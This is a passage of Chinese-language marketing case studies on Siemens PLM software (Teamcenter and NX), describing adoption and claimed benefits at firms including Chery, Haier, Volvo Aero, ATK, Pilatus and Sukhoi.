Dome都有着相似的设置,包含一个360度的八边形布局。每面墙上有两个投影仪,以便通过被动式偏光眼镜形成立体图像。投影图像通过八面墙反射混合,在中央形成一个360度的无缝全景图。这八面墙分别由八个工作站负责。每个工作站都有两个输出,向投影仪投射视差图像(分别为左右眼创造三维立体效果)。另外还有一个工作站负责同步与其他工作站相关的输出透视图。 概念与布局的视觉比较 “在流程早期,我们就可以在Dome中进行概念和布局的视觉比较。这是一个迭代过程,在系统工程“V”形图的各阶段循环往复。我们让客户尽早参与并进行评估。我们加载概念图——根据需要,有时可能包括多个概念——然后在Dome中进行试验。任何变更都被反馈到设计中,而计算机辅助设计(CAD)文档也随之更新。在“V”形图流程的下一阶段,我们会再次加载并评估设计。”Vallis说,“凡是CAD系统能做到的,我们也可以。比方说,我们可以移动层,查看层下的情况;可以添加或移动设备、人员、武器、装甲等。不仅如此,我们还能制作对象的动画效果,比如门和炮塔等。” 实际大小的三维立体模型 “就在金属切削之前,我们可以呈现逼真的高保真视觉效果,包含布线、管路等各方面,全方位评估可维护性和可达性。”Vallis说,“对于重大的客户陈述和审核,我们会使用Vega Prime可视化系统,通过VR Dome展示解决方案的全尺寸三维立体模型。我们可以制作车辆模型表面的动画和渲染效果,提供全特征的背景。我们取得了非常不错的成绩。” 沉浸式数字样机,进行实际的设计验证 一般而言,工程师和绘图人员主要在CAD工作站工作。“但是,如果参与人员不止两三个,就很难在单个桌面上进行评审,”Vallis说,“他们没办法进行全尺寸评估,因而也就可能遗漏某些问题。但有了Teamcenter软件,我们可以在VR Dome中加载JT格式的模型,只要一个小时左右的时间,而往常这个过程通常需要好几天的时间(尽管模型表面是着色而非渲染,且省略了背景)。虽然我们可以增加至八个屏幕,但目前只用了三个。” Vallis说有时候他们拿到的CAD图纸,虽然VR Dome的子系统显示有碰撞,但一般要到流程后期才被识别出来,届时所花费的成本和时间已不可挽回。“在Dome中,我们能快速发现碰撞,”他说,“因为我们看到的是整个模型,而绘图人员在其桌面上看到的可能只是单个对象,如一把椅子、一个显示屏、一个控制器或部件或装配一侧的一个焊接面板等。” 在这些解决方案中,Teamcenter的作用是管理必需的多投影图像,并将它们传输至VR Dome。Teamcenter的概念桌面功能可增强CAD模型的真实性,使用户能够利用其原有的经ISO标准认证的JTTM 数据格式,进一步提高其数字样机和周边场景的真实性。(JT文件格式是在现代产品生命周期管理(PLM)环境中实现三维数据可视化、协同及数据共享的开放技术,已得到广泛的应用。JT Open program和JT Open toolkit是Siemens PLM Software公司提供的PLM Components软件工具组合的一部分,为用户创新提供支持,并促进CAD、CAM、CAE及PLM应用之间的互操作性。) Teamcenter概念展室功能使用户可以在按照1:1比例创建的虚拟环境下审核(用概念桌面Concept Desktop制作完成的)虚拟产品。与Dome相结合,该功能可以为正式和非正式的数字设计审核提供一个沉浸式评估环境,对于不甚了解CAD图像的利益相关者而言尤其有效。 改善决策制定和冲突解决 VR Dome的一大优势在于能够直接读取Teamcenter创建的行业标准三维JT文件,Teamcenter是GCS生产管理系统的一部分。Vallis表示,“所有新任务都是用NX完成、用Teamcenter管理的。遗留的任务继续使用Pro/Engineer,但也由Teamcenter进行管理。” “通过在VR Dome中呈现NX设计的三维立体效果,工程师可以避免二维图纸造成的模棱两可。而且,通过VR Dome实现协同设计评审,使我们能够在为单个变量建立原型所需的短时间内评估更多的概念和变量。此外,我们还能对视线、可达性及间隙等人体工程学因素进行评估。VR Dome的数字样机能帮助我们改善决策制定过程,尽早识别并解决冲突。” 旗舰设施,高价值投资 “虽是笔大投资,但很有价值,”Vallis说,“我们在多个军事平台上部署应用,在问题识别、子系统集成以及设计阶段的概念选择和达成一致方面取得了极大的效益。我们将VR Dome应用于Terrier车型,结果很轻易地就将数据从Teamcenter转移至三维Dome中。而且,在原型阶段之前,我们很早就将风险降到了可控制的水平。这是公司的旗舰设施,也是客户的首选。我们一直以能够满足紧急作战需求而闻名遐迩,现在有了它,更是如虎添翼。” 案例五 Teamcenter助力奇瑞获取更大市场份额 业务挑战 ·加快产品开发和制造,更快地向市场推出新车型。 ·转向“按订单生产”模式,以提高客户的满意度。 ·提高汽车产量以满足日益增长的市场需求。 成功关键 ·全面的产品生命周期管理(PLM)环境。 ·知识重用。 ·产品配置管理。 ·工作流的数字化管理。 ·PDM-ERP集成。 实施效益 ·工程变更只需3~5天(原先需要10~20天)。 ·数据重用率从5%上升到20%~30%。 ·数据查找与提取时间缩短了90%。 ·早期问题检测减少了工程变更。 ·提高了产品质量,大幅度削减了成本。 ·产品上市时间更短。 业务举措 ·企业数据管理。 ·新产品开发。 Teamcenter助力中国第四大汽车OEM在快速增长的汽车市场上获取更大市场份额。 抓住发展机遇 奇瑞汽车有限公司是中国第四大汽车生产商,公司员工约2万人,生产车型达12种,涵盖乘用车、SUV和公交巴士。奇瑞也因其在中国汽车市场的迅猛发展而闻名。2004年,公司销量为86000辆,排名第九。近两年来,公司销量增至305000辆,使公司跻身于国内汽车厂商的第四位。 以在高速发展的中国汽车市场上获取更大市场份额为目标,奇瑞汽车有限公司将要面对以下这几大关键业务挑战:①加快产品开发和制造进程,尽快向市场推出新车型;②从“以产定销”转向“按订单生产”模式,加强汽车定制化,以提高客户的满意度;③开发新的生产平台以满足日益增长的市场需求。 产品生命周期管理(PLM)解决方案软件为奇瑞汽车搭建平台 自2003年以来,奇瑞汽车有限公司就从Siemens PLM Software引进PLM技术来应对这些挑战。Siemens PLM Software是西门子自动化与驱动集团的全球性分支机构。据奇瑞信息技术公司的刘颖介绍,“选择UGS PLM Software的原因在于其在汽车行业的深厚背景,以及Teamcenter数字化生命周期管理解决方案的广泛适应性。” Teamcenter为奇瑞汽车公司的技术飞跃打下了坚实基础:用于协同和知识重用的产品管理平台;对协同设计团队的支持功能;产品配置管理和精确数据流(支持“按订单生产”);工程变更管理;项目管理和PDM-ERP集成功能。 Teamcenter实施团队包括了来自奇瑞和Siemens PLM Software双方的人员。在Teamcenter全面运行前,由研发部门在CAD(UGS NX软件)、文档管理、产品结构和配置管理、工作流程管理方面进行了为期3个月的试运行。 市场占有率是衡量成功与否的标志 奇瑞汽车公司PLM解决方案最终取得成功的标志,应当是更高的市场占有率和客户满意度,而这两点在实施PLM之后都有所体现。另外,公司注意到PLM也使企业内部的许多方面实现了改进。在设计协同方面,由Teamcenter管理的信息得以更好地共享,文件一致性达到了95%,高于之前的65%,数据重用率由5%上升至20%~30%。更早的问题检测减少了工程变更量,工程变更操作比以前变得更快,由先前的10~20天缩短为3~5天,并可在5分钟内追踪变更,而过去则很难进行追踪。PLM的其他优点,还包括数据查找与提取缩短了90%的时间,由于PDM将制造和ERP系统集成而促进了从设计到制造过程的数据处理的简化。 PLM的诸多益处显而易见,但还有许多好处则超出了预期,其中包括产品开发过程的改进、更好地提高零件再利用率的设计模块,以及公司其他部门对PLM较高的接受度与信任度。 总之,Siemens PLM Software的技术可以帮助奇瑞提升公司的创新能力,以及在全球汽车行业中的形象。 案例六 海尔集团借助Teamcenter加快创新步伐 业务挑战 ·成为世界领先的白色家电供应商。 ·加快创新步伐以增强竞争力。 成功关键 ·促进零件库的重用。 ·电子管理的技术文档审批与发布流程的格式标准化。 ·改进项目的可见性和监督功能。 ·支持全球化设计和供应链运行的软件平台。 实施效益 ·新产品上市时间加快15%,质量得以提高。 ·精确的制图减少了返工和错误采购。 ·通过重复使用零件和实现零件标准化,使用的零件数量减少了29%,批量采购降低了成本。 ·非增值性的协同活动减少80%。 ·增强企业效益。 业务举措 ·价值链同步。 ·新产品开发。 ·法规遵从。 ·知识及知识产权管理。 ·通用化和重用。 解决方案/服务 ·Teamcenter 海尔集团是世界第四大白色家电制造商,旗下拥有240多家公司,在全球30多个国家建立本土化的设计中心、制造基地和贸易公司,全球员工总数超过五万人,重点发展科技、工业、贸易、金融四大支柱产业,已发展成全球营业额超过1000亿元规模的跨国企业集团。 “创新驱动”型的海尔集团致力于向全球消费者提供满足需求的解决方案,实现企业与用户之间的双赢,加快新产品开发步伐则是其重要目标。海尔集团旗下已有8大产品线运行了UGS PLM Software的产品生命周期管理(PLM)软件,以支持创新进程和加快产品上市时间。选中Siemens PLM Software的解决方案,是基于Siemens的良好行业背景以及其产品的功能特征。PLM解决方案的实施,是由海尔集团研发与IT部门以及8大产品线的60位关键用户来负责的,并由Siemens PLM Software提供技术支持。 夯实研发的基础 海尔的产品分96大类、15100种规格,零部件种类与技术文件繁多。由于业务的快速增长,这类信息每年以40%的速度增长。实施PLM解决方案之前,包括图纸、文档、零部件等信息散落在不同的系统中,版本不统一,集团无法有效利用相关的信息进行标准化工作的推进,在质量的控制、生产、采购环节也出现了诸多的问题。 海尔使用Siemens PLM Software的数字化产品生命周期管理解决方案Siemens Teamcenter来解决这些问题,建立了集中的零部件和文件库。目前,100%的技术图纸都已采用数字格式(过去只有80%),存储在Teamcenter库中。文件得到了标准化处理,并随着使用Teamcenter来进行审核与发布以及版本控制管理,文件信息的准确程度和一致性达到了一个新的高度。这也消除了原先因订单出错而导致的经济损失,以及由于错误的文件而造成的制造方面问题。 除了技术类的文件管理以外,所有的零部件也都在Teamcenter中实现了分类管理,进而提高了知识的重用性。自运行Teamcenter后,海尔已减少了29%的零部件使用数量,零部件的验证和认证速度加快50%以上,同时也因零部件更大批量的采购而节省了费用。 协同缩短产品上市时间 海尔还利用Teamcenter提高新产品开发的效率,支持全球化设计协同和供应链的运行。过去由于新产品开发项目的不可视化,开发效率低,存在较多的项目拖期情况。现在,海尔8大产品线的所有新产品开发项目都由Teamcenter来控制,其开发状态一目了然,项目团队成员根据项目计划提前参与到研发过程中,协同开发,减少了80%的非增值类的协同业务活动,确保缩减了15%的产品上市时间,也逐步逼近公司零延迟的目标。 海尔的PLM解决方案正得以持续扩展。公司的未来计划包括使用Teamcenter管理工程变更与物料清单,同时以Teamcenter为基础建立起特殊的流程管理机制帮助企业实现法规遵从。公司还计划将Teamcenter延伸至所有的分支机构,将其与ERP、QIS、MES、物流和售后服务相集成,以形成一个涵盖产品整个生命周期的企业级业务平台。 海尔的实力在于创新,公司所拥有的7000多项专利就是最好的证明。这些专利中有1234项涉及海尔的发明创造,589项属于软件专利。海尔把产品生命周期管理(PLM)解决方案看成支持创新和所有业务战略的基础,包括全球性品牌的创立、多样化和全球化。 案例七 沃尔沃航空发动机公司利用NX知识驱动自动化技术打造产品优势 业务挑战 ·缩短投标和开发周期。 ·更加迅速地对OEM商的设计变更做出反应。 ·支持企业对质量的承诺。 业务举措 ·利用NX Knowledge Fusion软件,把设计规则植入建模环境之中。 ·开发集成了建模和分析功能的应用程序。 ·利用知识驱动的应用程序来控制第三方程序。 ·利用经过证明的有限元分析(FEA)策略来验证每一个迭代。 实施效益 ·缩短了前置准备时间,投标更准确。 ·每天验证四个设计迭代,而以前每周只能验证一个设计迭代。 ·可以在数小时之内完成以前需要整月的变更。 基于知识的设计的创新 为了简化产品开发,沃尔沃航空发动机公司的管理人员评估了知识驱动的自动化技术(KDA)。利用该技术,可以把设计规则以及其他工程智能(通常存储在硬件或者人员的记忆中)植入软件之中。由此,基于知识的应用程序可以驱动设计,使很多建模过程实现自动化并且确保一致性,遵守企业标准。沃尔沃航空发动机公司的工程师发现了KDA的更大潜力。他们意识到,除了使几何建模实现自动化之外,KDA还能够作为一种方法来使其他开发活动实现标准化并且对其进行控制。比如,可以对基于知识的应用程序进行开发,以便集成分析任务(比如有限元分析)。 在寻找能够支持该愿景的KDA软件的过程中,沃尔沃航空发动机公司的工程管理人员评估了当时可以获得的大部分商业KDA程序。他们选择NX Knowledge Fusion有几个原因。一个关键优势就是它与基于特征的CAD紧密集成,比其他程序更加容易把知识传输到CAD环境之中。而且,沃尔沃航空发动机公司还相信,通过与Siemens PLM Software一起开发,该软件具有最大潜力来控制更广泛的开发活动,包括那些涉及第三方程序的活动。 效果明显 沃尔沃航空发动机公司创建了数个知识驱动的应用程序。其中一个就是“技术验证”应用程序(为一个名为中间气缸的发动机零件的设计而创建),为该公司如何利用该技术提供了一个良好实例。工程师输入中间气缸的功能规格,比如气流的空气动力学定义、温度图、成本要求、装配方法等。Knowledge Fusion利用这些输入来计算设计参数,然后自动生成一个实体模型和中面表示,还自动创建一个分析网格。利用该分析网格,可以迅速进行有限元应力计算。除了生成CAD几何图形和行为分析之外,该应用程序还生成一个包括可制造性问题的报告、一个成本分析以及材料清单。 利用该应用程序,沃尔沃航空发动机公司每天可以评估四个中间气缸设计迭代,而在过去每周只能评估一个。该应用程序创建了一个强调质量的标准化过程,利用经过证明的FEA策略来验证每一个设计迭代。在概念阶段,该公司就利用该应用程序来获得更加准确的成本估计,以便对发动机设计中的变更迅速做出反应。现在可以在数小时之内处理以前需要花费整月的变更,而较简单的变更则可以在20分钟内完成。 总体而言,这些高效率缩短了零件设计的前置准备时间。沃尔沃航空发动机公司一些其他知识驱动的应用程序甚至比中间气缸应用程序更加复杂。该公司还使用Knowledge Fusion来简化某些经常进行的CAD操作。与以前的方法相比,编写知识驱动应用程序的设计过程的效率提高了70%到80%。Isaksson及其同事继续扩展他们对KDA的使用,下一步计划把第三方应用程序“计算流体力学(CFD)分析”集成到KDA环境之中。“我们发现了KDA在简化我们的开发过程并确保质量方面的巨大潜力,”Isaksson表示,“我们依靠Knowledge Fusion来提供实现我们的KDA愿景所需的功能。” 案例八 ATK通过标准化的PLM战略推进MBE能力建设 业务挑战 ·复杂、关键的产品。 ·在预算范围内准时交付产品的压力。 ·很多不同的事业部。 ·平衡创新与执行。 成功关键 ·所有部门统一采用PLM技术。 ·用“快速启动”方法来实施。 ·利用PLM的全部应用广度。 ·让整个生命周期中的所有参与者参加进来,包括客户、供应商和合作伙伴。 实施效益 ·把PLM部署时间从两年缩短到6~8周。 ·在预算范围内按时提供技术卓越的方案。 ·按时发射下一代Ares火箭。 ·提高了工程生产力。 ·改善了需求责任性与符合性。 解决方案/服务 ·Teamcenter。 ·NX。 ATK是一家顶级航空航天与国防企业,在美国22个州、波多黎各以及世界其他地方拥有18000多名员工。该公司开发和制造武器、防务与空间系统,其目标是确保客户实现各种目标——不管这些目标是涉及军事行动、卫星发射,还是技术突破。 ATK航空系统集团负责技术与工程的副总裁David Reimer表示:“ATK注重任务的成功完成,使我们的客户取得成功。我们参与了航天飞机计划、Ares计划和航天飞机更换计划,涉及很多科学技术。我们不仅建造实体火箭发动机,而且还开发其他先进产品,甚至包括一种治癌药物。” “我们的业务目标是‘实现创新’,这意味着实现我们对客户的承诺,即理解客户需求,积极创新,并且将创新产品交到战士、宇航员以及客户的手中,以便满足他们的任务要求。” 用PLM战略实现创新 为了促进创新,ATK已经全面实施了一套涵盖全生命周期的PLM战略,各个事业部以及整个价值链统一部署PLM。ATK航空系统集团IT总监Alan Whitaker表示:“该PLM战略对我们很重要,因为我们正在创建一个可以在全公司统一使用的环境。Siemens PLM Software已经帮助我们把精力集中在对我们真正有意义的PLM上。”Riemer补充道:“我们之所以选择Siemens PLM Software,是因为有两个基本因素:第一个是Siemens PLM Software承诺确保我们成功;第二个是Siemens PLM Software提供的工具箱涵盖的范围非常广。” ATK的PLM战略始于一个项目。ATK工程系统高级经理Jon Jarrett解释道:“该项目帮助ATK内部的所有机构以及ATK外部的供应链进行从组合管理到实际收集需求,并使用这些需求的全部工作,然后用Siemens PLM Software的工具来设计和分析产品。最重要的事情之一显然是在正确的时间以正确的价格制造并向客户交付产品。” 正确的时间和价格意味着需要正确的系统。有些公司墨守成规,因此在选择最好的PLM解决方案时受到限制。Riemer表示:“在寻找工具时,大多数人都说‘我需要一个CAD数据管理器,一个时间管理系统……’,当你采用这种方法时,你就把目光局限在一个范围非常窄的点系统,而不是一个真正能够给企业带来革命性成果的集成解决方案。在Siemens PLM Software的产品中,我们找到了把所有这些单元集成在一个软件包中的方法。” 一种集成的企业方案能够最终实现有效协同。Jarrett表示:“我们可以在整个ATK集团内部使用Siemens PLM Software提供的解决方案,以便我们能够使用一种公共语言,以一种简洁的方式沟通,并且知道彼此在做什么,从而以一种与设计完全不同的方法进行制造。然后,我们能够用Siemens PLM Software提供的公共工具,在产品的制造、质量以及所有其他方面进行沟通。” 在ATK,协同通常延伸到了企业之外。Riemer解释道:“在Ares和航天飞机计划中,我们与美国国家宇航局开展了广泛协同。我们之所以能够与美国海军和空军开展计划合作,是因为我们能够与其协同。通过使用Teamcenter的社区协同解决方案,我们像一个团队一样共享,行动一致。”Jarrett补充道:“我们现在用Teamcenter把产品、客户和供应商连接在一起。他们是我们实际工作流程中的一部分,因此他们可以批准我们的设计以及设计变更。我们扮演一个协同角色,用Teamcenter从各地收集创意,然后在一个系统中对其进行管理。” “对于Ares,在Teamcenter里面建立一个单一的数据源带来的收益促成了这样一个事实,即我们已经做好了让Aries IX升空的一切准备,这是Aries IX这个夏天的第一次无人飞行。以前很多人都说这不可能做到。我们即将推出开发的第一款发动机——一款分为五部分的全尺寸实体火箭发动机,也是世界上最大的火箭发动机,能够产生360万磅的推力,能够燃烧130万磅推进燃料。” 统一的PLM符合客户要求 作为Teamcenter的一个长期客户,ATK正在逐步过渡到Teamcenter的统一架构,以便利用当前市场上集成得最紧密的PLM。Riemer表示:“如果没有一个统一架构,你也能在系统之间有效共享和迁移数据,但是这只能算是一种松散的集成。而统一架构则能实现紧密集成——所有这些工具都共享一个公共数据集。你可以把项目管理、系统工程、CAD数据以及知识捕捉集成在一个系统、一个数据库中。数据输入之后,就可以多次共享。” Whitaker补充道:“Teamcenter统一架构将帮助我们更好地实现我们对客户的承诺。通过把时间安排信息、成本信息和技术信息集成到工程人员可以使用的一个完整软件包中,我们可以准确预测。当客户期望我们做些事情的时候,我们能够准时完成。在过去,我们必须把所有这些作为独立的应用来支持。现在有了Teamcenter统一架构,我们就能在一个公共环境中对其进行管理。” 管理客户需求。为了满足客户需求,ATK把Teamcenter的集成解决方案提高到了一个全新的水平。Jarrett表示:“我们关心的关键问题之一是管理一个产品组合。对于我们的业务而言,关键在于尽力理解客户的需求,尽力理解我们应该把业务资源和财务资源集中投入到什么地方。因此,充分利用组合管理软件,一定会对我们的成功起到十分关键的作用。” Riemer表示:“作为工程部门,我们有大量项目排队等待执行。因此一定要搞清楚,在希望启动的所有项目中,哪些项目在业务上的意义最大。我们用Teamcenter的组合管理工具来评估需要优先开发哪些产品,优先执行哪些计划,优先满足哪些客户需要。在这一过程中,我们同时还明确跟踪客户需求。” 有效的需求跟踪能够分清责任。Jarrett表示:“在前期收集需求,确实有助于确定谁需要使用这些需求。我们收集最重要的需求,然后将其分为工程需求、制造需求和质量需求,因此下游人员能够清楚地知道自己按什么需求进行设计或制造,然后验证自己是否真正满足了这些需求。通过管理最重要的需求和个别需求,整个价值链都知道相应的需求并对其负责。” 不仅仅是创新,而且还实现它们 在竞争异常激烈的创新业务中,仅仅拥有最好的技术还不够。ATK的PLM战略还注重执行。Riemer表示:“在工程方面,我们做的最重要的事情之一就是项目管理。看看目前的航空航天市场就知道,很难单单在技术上取得竞争优势。我们不得不与竞争者一起遵循相同的物理定律,向相同的供应商购买材料。因此,当你真正到了这一步时,与竞争者向客户提供的技术解决方案相比,你所提供的就很难取得质的飞跃。这并不意味着我们不会去改善这一情况,我们其实已经采用了一些工具来进行改善,但是真正重要的是完美地实现我们对客户的所有承诺,这就要求在预算范围内按时提供一个在技术上卓越的解决方案。” Jarrett补充道:“我们在技术上真的很棒。但是对我们而言,管理成本和时间却是一个全新的游戏。尽管我们有效,但是总有改进的空间,这可能是一种竞争优势。因此,我们专注于用项目管理工具来帮助我们彻底理解需要实现的时间表。识别在设计产品时必须满足的关键期限,为每个人提供这些信息,让其在整个过程中进行协同,这对我们满足计划的成本和时间表的要求非常重要。” 在帮助ATK实现目标方面,Teamcenter的系统工程功能起到了非常出色的作用。“我们可以把一个客户的一组需求、工作说明一直到各项任务集成在一个时间表里面。还可以反过来追踪工作说明,以了解为什么要执行这一任务。了解这部分任务是为了满足哪些客户需求。任何其他东西都没法跟它媲美。公司购买一个时间管理系统用于项目管理,但是这个系统却是一个单独的系统,很多人用Word文档来创建自己的工作计划。我们则能够用Word等Microsoft Office产品,在Teamcenter里面创建工作计划。我们可以真正地跟踪所有客户需求,直到‘我们为什么做这些’。因此,当向一名工程师分配一项任务时,我们可以向其提供定义好的工作计划,包括:‘必须在几个小时内完成任务。必须在时间框内完成任务。完成某项任务所需要的技术要求。’我们用Teamcenter的系统工程功能来完成这些工作。” 设计并仿真下一代航天飞机 对于产品设计和分析,ATK使用Siemens PLM Software的NX数字化产品开发解决方案。Riemer表示:“长期以来,ATK一直使用I-DEAS产品,我们现在正在向NX过渡。把NX用于Ares——航天飞机的一种替代物,可以把人类送到月球以及更远的地方,也许某一天会把人类送到火星。我们负责Ares内部第一阶段的整个开发工作。因此,我们必须开发线束,并且设计非常大的水管线路。我们还负责仿真与分析,因此现在开始用NX对Ares进行建模和仿真。” Jarrett表示:“现在用NX进行产品分析和仿真,可以帮助我们真正理解产品的运行。我们的产品用于照顾宇航员,有了Siemens PLM Software的工具,我们不仅有机会与美国国家宇航局共同发展,为现在的航天飞机计划做出贡献,而且还有助于推动Ares计划。在前期,对这些产品进行仿真是绝对至关重要的事情。我们必须理解它们能够承载多大的载荷,理解它们在飞行条件下的性能。在一个数字环境中进行仿真,是实现这一目标的唯一方法。” 快速启动,节约IT成本 在全球各个站点的统一架构上部署了Teamcenter之后,ATK公司开发了一种快速跟踪实施方法,以节约时间和IT成本。Whitaker表示:“IT方面,我们在ATK的‘卓越中心’管理Teamcenter环境,因此能够在整个企业内实现规模经济。我们使用的是标准过程,因此能够在该环境中提高并优化效率。” Jarrett指出:“Teamcenter的可扩展性令人惊讶,能够同时在多个站点管理整个项目。不管在什么地方,用户和工程师都可以轻易获得简明、具体的信息。” ATK注意到,快速跟踪一个项目具有很重要的价值。Whitaker表示:“‘快速启动计划’是Teamcenter特有的,使我们能够在需要时为ATK的各个站点创建并实施生产环境。这已经帮助我们大幅降低了实施成本,大幅减少了从一无所有到拥有一个完整生产环境所需要的时间。在‘快速启动计划’之前,实施如此复杂和投资回报率如此高的一个站点,往往需要几年时间。现在有了Teamcenter,我们能够在6~8周内就建立起一个新的站点环境。” 案例九 皮拉图斯飞机有限公司利用MBD技术实现并行工程 业务挑战 ·不断改进现有飞机。 ·以更快的速度开发新飞机并将其投放到市场。 ·确保在内部和外部传递知识。 业务举措 ·并行工程和主模型方法。 ·数字样机。 ·集成式设计与信息管理解决方案。 实施效益 ·PC-21的开发时间从6年缩短到3年半。 ·新工作过程的投资收益率高达15%~20%。 1939年12月16日,皮拉图斯飞机有限公司在Nidwaldner Kantonalbank的一间会议室成立。当时该公司仅为瑞士空军的一家小供应商,现在已经成为单发动机涡轮螺旋桨飞机制造领域的领导者,同时也是瑞士唯一一家在全球各地开发、生产和销售飞机以及教练系统的公司。 该公司的最新产品皮拉图斯PC-21是专门为军队飞行员开发的新一代教练机,它沿袭了该公司非常成功的PC-12教练机。PC-12是当今世界上最大的单引擎商用飞机,目前订单数量已经超过130架。这一成功不是偶然,而是基于对飞行的激情,对完美的追求,以及在满足客户期望方面的强烈意愿。 与其他涡轮螺旋桨飞机相比,PC-21不仅性能更好,而且更经济、噪音更低,水平飞行最高时速为325节,载荷极限值在-4G到+8G之间,非常适合于基本的、先进的战斗机飞行员训练。PC-21的航空电子系统基于一个开放架构,所有显示系统由软件控制,可以根据每架喷气式战斗机的飞行员座舱环境进行调整,与仪器和飞行仿真器仪器连接,形成了空军教练系统不可分割的一部分。 PC-21飞机 用NX来创建 皮拉图斯用NX数字产品开发软件和Teamcenter数字生命周期管理软件来开发PC-21。当皮拉图斯必须在NX和CATIA之间做出抉择时,该公司选择了NX,这是因为NX的CAM功能更强大。皮拉图斯研发部门副总裁John Senior表示:“决定性问题是我们是想绘制呢,还是想创建。答案非常清楚:‘用NX创建。’” 上市时间是飞机取得经济上成功的关键所在,因此皮拉图斯以并行方式设计、开发和制造PC-21飞机。在总结成功的最重要因素时,皮拉图斯项目经理Bruno Cervia表示:“我们并行执行所有过程,然后用一个单一模型,根据主模型进行数字建模。我们从来没有使用过模型的不同版本。”对于NX和Teamcenter,只有设计和数据管理系统紧密集成时并行工程才有效。皮拉图斯技术IT经理Hnnes Keller表示,NX/Teamcenter之间的结合还产生了其他巨大收益——节约时间并且使发布变更变得更容易。 Keller表示:“我们非常重视与Siemens PLM Software之间的合作。” 案例十 苏霍伊设计局基于Teamcenter/NX实现全面的数字化样机研发模式 业务挑战 ·开发并实施先进技术。 ·提高质量,提供卓越的飞行性能;提高产品燃油效率,降低运行成本。 ·减少研发时间和成本。 ·涵盖飞机设计、制造、装配、试验、维护等全生命周期的飞机研制流程。 业务举措 ·完整的数字飞机模型“无纸化”设计。 ·并行工程。 ·基于单一数据源的产品全生命周期数据存储。 ·设计、制造、试验、物流等业务协同。 实施效益 ·实现了与制造商和供应商之间的数字协同。 ·设计变更变得更快、更容易。 ·建立了可供整个公司使用的标准产品库。 ·为苏-30、T-50等多个飞机型号创建了数字样机。 苏霍伊设计局全称苏霍伊飞机实验设计局,是俄罗斯主要的军用飞机制造商,由帕维尔·苏霍伊于1939年创立,现在改名为苏霍伊公司,总部位于莫斯科。苏霍伊设计局是世界上著名的航空企业之一。在多年的发展历程中,总共研制了100多个型号的各类飞机,其中有约50种投入批量生产,且不乏世界名机。著名机种有截击机苏-9、苏-15,歼击轰炸机苏-7、苏-17、苏-24、苏-30、苏-34,强击机苏-25,歼击机苏-27、苏-35、苏-37及四代机T50。 正确的软件是成功的关键 苏霍伊设计局认识到,如果没有数字化产品开发软件,现在根本无法开发飞机。因此,他们研究、测试了各种系统,包括CADDS 5,I-DEAS、CATIA和Pro/Engineer以及Siemens PLM Software提供的数字产品开发系统NX。苏霍伊设计局MCAD负责人Evgeny Savchenko表示:“全球航空业都在使用NX和CATIA。我负责向工程师推荐他们需要的系统。他们最终选择了最初由航空航天制造商麦克唐纳·道格拉斯公司(现更名为西门子工业软件有限公司)开发的NX软件。” 采用数字样机 建立了企业计算机软硬件系统并且装机数量翻番之后,该公司开始了下一阶段。当时,苏霍伊设计局还实施了一些试点项目,为飞机创建数字样机,并且用Siemens PLM Software提供的工程产品和过程管理系统Teamcenter来管理数据。这些活动的目的是开发一款引擎重量较轻的飞机。 在该阶段建立了处理数字样机的基本原则,包括“自上而下”装配,责任分配和访问控制,Teamcenter内用户空间的标准化,图纸和模型的划分,以及向模型添加需求等。最重要的变化来自于NX WAVE技术的实施。NX WAVE技术用于建立模型间受控关联连接的结构。 该公司建立了一个“基本控制结构”(BCS)。BCS包含在初步开发阶段获取的信息,比如曲面模型、承载方案、路径选择和布线方案等。工程师只能从BCS获取需要的信息,并且在自己的工作空间里以数字化方式连接产品——把一个没有冗余元件的模型连接到他们的结果区域。这个模型将被纳入产品的数字模型中。在经常出现相互冲突的需求而要不断修改设计时,该方法有助于控制变更。Siemens PLM Software莫斯科办事处帮助苏霍伊实施了这些技术。 Savchenko表示:“现在整个公司都可以访问数千名员工的工作成果——这些成果已经成了公司的资产。这是产品数据管理(PDM)的主要功能。我认为,PDM和CAD系统可以由不同提供商提供,但是PDM系统必须由Siemens PLM Software提供。这是我们从自身经验中总结出来的结论。” 该项目使苏霍伊设计局相信,PDM是创建数字样机必需的工具,因为它会给用户带来很多收益。Savchenko表示:“监控无数个文件,更新版本……这些根本无法做到!公司必需了解管理产品数据的重要性。” 由于苏霍伊设计局的工程师在Siemens PLM Software解决方案方面的经验更加丰富,并且接受了这些解决方案的使用培训,因此在实施Superjet-100(超级喷气式飞机)项目的过程中,苏霍伊民用飞机公司得到了这些工程师的大力支持。当Superjet-100项目开始时,整个数字产品都存储在Teamcenter中,因此公司认识到不仅无法在另一个PDM系统中执行该项目,而且也无法在多个PDM系统之间实现互操作。大家都清楚地知道,只能用一个单一PDM环境来支持该项目——这个单一的PDM环境就是Teamcenter。 苏霍伊公司建立集中标准产品库的努力正是集中在这一点。整个公司齐心协力,为建立产品库而不懈努力。 数字产品数据包括更多的几何体 在PLM实施过程的第四阶段,最重要项目之一是开发苏-30的数字样机以及在伊尔库茨克航空工厂开始生产该飞机。苏霍伊把数字样机作为一个文件结构来传输,并且提供了标准、纸质工程文档。在该项目中,俄罗斯工厂首次得到一个开发得这么好的飞机模型,工厂管理层对此非常满意。 Savchenko解释道:“我们的经验是,我们需要向工厂提供含有制造所需全部信息的模型。”在这一阶段,苏霍伊设计局承接了一项名为“ELOIZ”的数字技术开发任务,该技术不仅含有产品几何体,而且还含有制造产品所需的信息,比如材料、技术需求、包含的标准零部件、描述方式(CAD模型还是图纸)、授权发布的文件、修改等。Siemens PLM Software的解决方案为这些数据的创建和维护提供了基础。 苏霍伊数字样机 连接企业的未来计划 Savchenko表示:“通过实施Siemens PLM Software解决方案,我们公司实现了很多重要的直接和间接收益,比如操作质量和生产力大幅提升,成本大幅降低。这些都是很重要的收益,但不是关键收益。真正关键的是我们——苏霍伊设计局、工厂以及整个苏霍伊公司——都在实施这些重要的新技术。通过实施这些技术,我们不仅能够创建数字产品样机,而且可以用能够处理数字信息的现代化设备来制造产品。”该公司各个工厂现在都在安装这些设备。 苏霍伊目前正在建立企业数据交换系统。Savchenko补充道:“换句话说,我们正在打造一个配备现代技术并且在全球市场极具竞争力的现代化企业。我们的新目标中,很多都可以用Siemens PLM Software解决方案来实现。我们对已经实施的解决方案感到非常满意,并且对未来要实施的解决方案满怀信心。” 案例十一 BSH公司PLM应用实践 业务挑战 ·缩短产品上市时间。 ·产品创新。 ·产品复杂度提升。 ·全球化。 业务举措 ·统一的PLM数字化管理平台。 ·知识和数据的单一来源。 ·规范设计方法,保证数据正确转递和重用。 ·实现设计、分析、制造的一体化。 ·数字化制造,提高规划和制造效率。 解决方案 ·NX ·Teamcenter ·Tecnomatix 实施效益 